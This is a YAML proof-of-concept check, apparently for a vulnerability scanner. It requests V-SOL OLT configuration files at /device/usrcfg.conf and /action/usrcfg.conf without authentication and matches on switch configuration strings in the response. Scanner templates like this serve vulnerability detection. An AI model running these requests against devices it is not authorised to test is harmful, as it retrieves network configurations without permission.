name: poc-yaml-v-sol-olt-platform-unauth-config-download
manual: true
transport: http
rules:
    r0:
        request:
            cache: true
            method: GET
            path: /device/usrcfg.conf
            follow_redirects: false
        expression: response.status == 200 && response.content_type.icontains("application/octet-stream") && response.body.bcontains(b"switchport hybrid vlan ") && response.body.bcontains(b"storm-control broadcast ") && response.body.bcontains(b"interface ")
    r1:
        request:
            cache: true
            method: GET
            path: /action/usrcfg.conf
            follow_redirects: false
        expression: response.status == 200 && response.content_type.icontains("application/octet-stream") && response.body.bcontains(b"switchport hybrid vlan ") && response.body.bcontains(b"storm-control broadcast ") && response.body.bcontains(b"interface ")
expression: r0() || r1()
detail:
    author: socat
    links:
        - https://www.exploit-db.com/exploits/47433
    vulnerability:
        id: CT-515845
        level: high
